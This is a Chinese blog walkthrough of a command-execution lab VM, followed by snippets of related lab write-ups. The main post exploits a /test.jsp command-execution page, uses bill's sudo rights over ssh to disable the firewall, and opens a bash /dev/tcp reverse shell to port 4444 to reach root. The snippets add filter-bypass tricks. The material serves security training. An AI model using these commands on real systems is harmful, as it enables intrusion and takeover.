web靶机系列-命令执行

最新推荐文章于 2023-09-05 13:28:09 发布
最新推荐文章于 2023-09-05 13:28:09 发布
阅读量649 收藏 1
点赞数
文章标签: shell 安全 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/106398105
版权

主机地址:192.168.136.133
目标地址:192.168.136.135

先用nmap搜查:
在这里插入图片描述
然后用nitko工具查找网站的信息,看到有敏感文件泄露:
在这里插入图片描述
登陆网站并访问/test.jsp,看到界面有提醒用“ls -l /tmp”查看文件
在这里插入图片描述
当输入命令后,得到响应则可以认定为命令执行漏洞
查看home目录,挖掘用户信息 ls -alh /home/
在这里插入图片描述
查看具体用户的目录: ls -alh /home/用户名/,发现用户有ssh服务
在这里插入图片描述
查看系统消息:uname -a
在这里插入图片描述
查看bill用户 sudo命令的权限: ssh bill@localhost sudo -l
在这里插入图片描述
关闭防火墙: ssh bill@localhost sudo ufw disable
在这里插入图片描述
nc监听4444端口
在这里插入图片描述
输入ssh的命令注入,ssh bill@localhost sudo bash -i >& /dev/tcp/地址/4444 0>&1
反弹shell
在这里插入图片描述
监听成功并返回答复,此时是shell
在这里插入图片描述
查看root的文件目录,得到flag
在这里插入图片描述

0x 0101
关注
命令执行漏洞—简单利用1(墨者靶场)
weixin_44431280的博客
03-03 1808
命令执行漏洞—简单利用1(墨者靶场) 命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
命令执行靶场实战
qq_23347209的博客
05-31 652
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
web 攻击靶机
dinghongzui6895的博客
04-22 556
一、sql注入靶机攻击 首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24 发现可疑ip地址192.168.2.129 并使用nmap扫描这个ip地址,发现其开放了ftp和http协议 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sq...
corrosion 靶机(ffuf模糊测试,命令执行)
m0_66299232的博客
01-13 928
4.因为22端口开放,又有文件泄露漏洞,那么就可以利用22端口把木马写入auth.log文件里,造成命令执行。4.下载下来后,进行解压不成功需要密码,使用fcrackzip进行破解密码。2.访问网页1发现/archives下面有俩个文件,访问后有一个php文件。1.由于没有找到可利用信息,将linpeas.sh下载下来,进行探测。2.找到一个user_backup.zip文件,应该是一个用户的备份!3.既然这个命令是三个小命令合起来的 ,那么就有三种提权方法!6.开启监听,执行命令,反弹shell成功。
iwebsec靶场(命令执行
果粒程
03-03 521
iwebsec靶场(命令执行
vulnhub靶机AI-Web2渗透笔记
liver100day的博客
07-24 2230
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.3 访问web网页(80端口)2.漏洞利用1 利用目录穿越(Directory Traversal)漏洞读取/etc/passwd2.利用暴力破解获取密码4 获得目标shell提权 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/ 渗透过程 1.信息收集 1..
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2428
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
web渗透测试靶机(新手)
05-07
这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用这些漏洞来提升自己的技能。 渗透测试,又称黑客道德测试,是对网络系统进行安全评估的一种方法,目的是发现并修复潜在的安全风险。在这...
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 939
SQL注入getshell靶机实战
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
命令执行漏洞及Bulldog靶机实战
随 风
10-31 786
一、命令执行产生的原因 命令执行漏洞是指应用有时需要调用一些系统命令函数,如:system()、exec()、shell_exec()、eval()、passthru(),代码未对用户可控参数做过滤,当用户控制这些函数参数时,键可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。 常见连接符 (1)A;B (2)A&B (3)A|B (4)A&&B (5)A||B ...
vulrange命令执行靶场绕过
lionwerson的博客
03-31 275
1.开启靶场,提示过滤了cat命令 1.过滤了cat命令可以用其他的命令代替 (1)more (2)head (3)sort 等其他的命令替代 |ls #显示flag文件 |ls flag #显示flag文件 显示出flag852456.txt | more flag/flag852456.txt 读取flag 读取到的flag,其实也可以直接访问这个文件。 2.过滤空格 ${IFS} ${IFS}$1 $IFS+$1 <> %09(php环境下) 通过上面三种
DC-6靶机(wordpress命令执行、nmap提权)
m0_66299232的博客
11-15 362
1.需要修改hosts文件(和dc-2操作一样)echo '192.168.166.136 wordy'>>/etc/hosts。3.切换成了jens账户,再次执行sudo -l;我们发现 存在nmap 可以提权了。wpscan --url http://wordy/ -e u //枚举用户。4.登录页面我们发现了存在一个Activity monitor的一个插件。1.尝试ssh登录,发现成功登录;sudo-l 发现可以利用。。wordpress命令执行、nmap提权
渗透测试之命令执行漏洞
Zane·S的博客
05-06 1027
介绍命令执行漏洞 应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞。 命令执行漏洞的利用 Windows系统常用管道符: 管道符 含义 ...
web靶机系列-命令注入
rlenew的博客
05-28 924
主机:192.168.136.133 靶机:192.168.136.139 用nmap、nikto扫描操作 发现在robots.txt下存在五个文件 在nothing的页面源代码下发现有五个密码 在刚刚的nikto的扫描中存在一个/secure/文件,打开发现一个压缩包 压缩包需要密码,经测试密码是freedom,但解压后的文件是txt文件。需要更改文件后缀,得到 登陆给出的网址,输入账户。密码再测试一下,发现是diana 用searchsploit查找页面架构下了漏洞 第一个可利用漏洞是
安装部署WEB安全测试用的靶机(DVWA,MCIR,pikachu,mutillidae,bwapp)
reqian23
03-06 799
1.准备 Windows 2008 r2 或者 CentOS 虚拟机(本案例以 Windows 2008 r2 为范本) 5个靶机及xampp在这里 链接:https://pan.baidu.com/s/1MWzZuVt8kfTIPeEVcrDniA 提取码:7lpt 在Windows 2008 r2上安装xampp 一直下一步就可以 安装完之后会自动打开,先关掉(还有托盘里的) 删掉目录下的临时文件: 找到xampp-control,右击属性-兼容性-以管理员身份运行 发
web靶场——xss-labs靶机平台的搭建和代码审计
最新发布
weixin_51525416的博客
09-05 5877
web靶场-xss-labs靶机平台的搭建和代码审计
6.26.1 命令注入靶场
ailkli的博客
06-26 161
php system(base64_encode('放置base64代码'));将1.csv改成<?进行下面的操作 其实上面的放3次包监听过程可忽略,进行如下操作即可。发现打不开mp3打开属性 发现不是真mp3文件,用记事本打开。在浏览器进行抓3次放3次绕过防火墙的bash64的包。在本地创建1.csv文件(空文件只要是.csv后缀)以上操作说明filename存在代码执行和代码注入。本地返回playsms页面上传文件抓包。在sms网页上传1.csv文件。
OWASP靶机下载使用指南:十大Web安全风险解析
1. OWASP靶机:OWASP靶机是一系列故意设计成包含各种安全漏洞的Web应用程序,专为安全研究人员、开发者和安全测试人员使用,以便在安全环境中学习如何发现和利用这些漏洞。靶机通常模拟真实世界的Web应用程序,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值